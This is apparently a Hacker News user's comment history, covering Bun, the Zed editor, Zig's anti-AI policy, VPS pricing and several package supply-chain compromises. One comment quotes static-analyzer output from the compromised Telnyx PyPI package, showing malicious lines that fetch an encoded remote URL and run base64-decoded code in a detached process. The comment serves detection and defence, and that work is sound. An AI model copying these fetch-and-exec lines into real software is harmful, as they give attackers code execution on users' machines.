Hacker News: f311a

New comment by f311a in "Bun's experimental Rust rewrite hits 99.8% test compatibility on Linux x64 glibc"

f311a — Sun, 10 May 2026 09:25:18 +0000

I think the main problem with Bun is that they are trying to move very quickly.

Tigebeetle devs spend 90% time working on stability, safety, tests and so on. They don't need new features, they need reliable software. Their database is pretty simple in terms of features and their goal was always stability and speed. Bun devs spend the majority of the time adding new features.

New comment by f311a in "Meta in row after workers who saw smart glasses users having sex lose jobs"

f311a — Thu, 30 Apr 2026 14:01:36 +0000

Why do they even need workers to classify naked content? They could filter some content prior to passing it to workers. They already have models to moderate explicit content.

New comment by f311a in "Zed 1.0"

f311a — Thu, 30 Apr 2026 07:36:58 +0000

They have presets from other IDEs and editors. I use a weird combination of Jetbrains and helix shortcuts with helix mode. Because I used them the most.

New comment by f311a in "The Zig project's rationale for their anti-AI contribution policy"

f311a — Thu, 30 Apr 2026 07:12:34 +0000

You still have to review everything manually again anyway. It's a compiler for a language, bugs and bad architecture decisions cost a lot. They moved to codeberg, so there are less garbage PRs now. They try to grow a culture where you expected to deliver good code in the PRs so the review takes less time.

It takes like 5 minutes to spot garbage PRs manually. LLM can flood you with a wall of text where only half of the stuff make sense. Also, they can't really spot bad architecture. It's a compiler in an unpopular language, don't forget that.

New comment by f311a in "Zed 1.0"

f311a — Wed, 29 Apr 2026 16:23:46 +0000

Just look at the PR, it's shows how it will look like. It's modal instead of a persistent tab.

New comment by f311a in "Zed is 1.0"

f311a — Wed, 29 Apr 2026 15:04:51 +0000

Tabs will still be supported. Also, when you search for references, it also opens a new tab, even when all references are in the same file.

New comment by f311a in "Zed 1.0"

f311a — Wed, 29 Apr 2026 14:48:55 +0000

Too bad they did not include better search UI into this release.

When you search, Zed opens a new tab, which I hate. Sometimes I just want to have a quick glance at some code and close the search using escape.

Telescope style search in vim, helix or JetBrains tools is so much better.

https://github.com/zed-industries/zed/pull/46478

New comment by f311a in "Spam in conversational replies to blog posts"

f311a — Thu, 23 Apr 2026 15:17:55 +0000

This is a big problem for wordpress, but custom engines with a simple client-side checks (js based) get close to zero spam. All those spammers use technology fingerprinting services to obtain a list of blogs and they look for popular blog engines only.

New comment by f311a in "Someone bought 30 WordPress plugins and planted a backdoor in all of them"

f311a — Mon, 13 Apr 2026 18:29:00 +0000

They inject backlinks, SEO spam to advertise payday loans, online pharmacy, casino and so on. Just imagine you can get 30k of links to your website at once. Google will rank that page very high.

One pharmacy shop that sells generics or unlicensed casino can make tens of thousands of dollars per day. So even one week is enough to make a lot of money.

New comment by f311a in "I run multiple $10K MRR companies on a $20/month tech stack"

f311a — Sun, 12 Apr 2026 09:54:51 +0000

You won't get such numbers on a $5 VPS, the SSDs that are used there are network attached and shared between users.

New comment by f311a in "I run multiple $10K MRR companies on a $20/month tech stack"

f311a — Sun, 12 Apr 2026 09:51:08 +0000

$5 VPS disks are nowhere near macbooks, they are shared between users and often connected via network. They don't seat close to CPU.

New comment by f311a in "I run multiple $10K MRR companies on a $20/month tech stack"

f311a — Sun, 12 Apr 2026 08:17:23 +0000

There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8gb of RAM. You can use it for caches or a database that supports concurrent writes. The $15 difference won’t make any financial difference if you are trying to run a small business.

Thinking about on how to fit everything on a $5 VPS does not help your business.

New comment by f311a in "Axios compromised on NPM – Malicious versions drop remote access trojan"

f311a — Tue, 31 Mar 2026 21:34:13 +0000

What are you using that utilizes Apple containers?

New comment by f311a in "Telnyx package compromised on PyPI"

f311a — Fri, 27 Mar 2026 19:29:37 +0000

GuardDog, but it's based on regexes

New comment by f311a in "Telnyx package compromised on PyPI"

f311a — Fri, 27 Mar 2026 19:00:29 +0000

They did not even try to hide the payload that much.

Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.

  hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip  --min-confidence high  --exclude HX4000

  warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
  86:13
       │
  7783 │         except:
  7784 │             pass
  7785 │
  7786 │         r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
       │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
  7787 │         with urllib.request.urlopen(r, timeout=15) as d:
  7788 │             with open(t, "wb") as f:
  7789 │                 f.write(d.read())
       │
       = Confidence: High
         Help: Data exfiltration is the unauthorized transfer of data from a computer.


  warning[HX4010]: Execution of obfuscated code.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
  10:9
       │
  7807 │       if os.name == 'nt':
  7808 │           return
  7809 │       try:
  7810 │ ╭         subprocess.Popen(
  7811 │ │             [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
  7812 │ │             stdout=subprocess.DEVNULL,
  7813 │ │             stderr=subprocess.DEVNULL,
  7814 │ │             start_new_session=True
  7815 │ │         )
       │ ╰─────────^ HX4010
  7816 │       except:
  7817 │           pass
  7818 │
       │
       = Confidence: VeryHigh
         Help: Obfuscated code exec can be used to bypass detection.

New comment by f311a in "A Faster Alternative to Jq"

f311a — Fri, 27 Mar 2026 12:48:10 +0000

JQ is very convenient, even if your files are more than 100GB. I often need to extract one field from huge JSON line files, I just pipe jq to it to get results. It's slower, but implementing proper data processing will take more time.

New comment by f311a in "LiteLLM Python package compromised by supply-chain attack"

f311a — Tue, 24 Mar 2026 15:49:49 +0000

There is no such tool, but you can use other static analyzers. Datadog also has one, but it's not AST-based.

New comment by f311a in "Tell HN: Litellm 1.82.7 and 1.82.8 on PyPI are compromised"

f311a — Tue, 24 Mar 2026 14:27:56 +0000

Their previous release would be easily caught by static analysis. PTH is a novel technique.

Run all your new dependencies through static analysis and don't install the latest versions.

I implemented static analysis for Python that detects close to 90% of such injections.

https://github.com/rushter/hexora

New comment by f311a in "Translate Garry Tan's LinkedIn-speak to plain English"

f311a — Thu, 19 Mar 2026 09:06:46 +0000

They actually did not add LinkedIn specifically. It's an AI translator that accepts anything in the `to` field.

https://translate.kagi.com/?from=en&to=Crypto%20Scammer&text...

New comment by f311a in "Show HN: LogClaw – Open-source AI SRE that auto-creates tickets from logs"

f311a — Thu, 12 Mar 2026 18:00:52 +0000

Why is this upvoted? The author did not even bother to read what he wrote.

> SOC 2 Type II ready

Huh? You vibecoded the repo in a week and claim it ready?